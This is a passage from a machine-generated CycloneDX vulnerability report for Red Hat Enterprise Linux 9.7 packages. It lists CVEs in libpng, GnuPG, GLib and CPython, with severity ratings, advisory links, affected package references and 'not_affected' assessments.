          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-28164",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        401,
        120
      ],
      "description": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-28164"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-28164"
        },
        {
          "url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/655"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/657"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28164"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7993-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-28164"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-03-04T19:42:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-30258",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-30258"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-30258"
        },
        {
          "url": "https://dev.gnupg.org/T7527"
        },
        {
          "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
        }
      ],
      "published": "2025-03-19T20:15:20+00:00",
      "updated": "2025-10-16T16:53:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-3360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-3360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-3360"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
        }
      ],
      "published": "2025-04-07T13:15:43+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-4516",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4516"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23530"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4516"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23530"
        },
        {
          "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292"
        },
        {
          "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a"
        },
        {
          "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d"
        },
        {
          "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142"
        },
        {
          "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b"
        },
        {
          "url": "https://github.com/python/cpython/issues/133767"
        },
        {
          "url": "https://github.com/python/cpython/pull/129648"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4516.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
        }
      ],
      "published": "2025-05-15T14:15:31+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
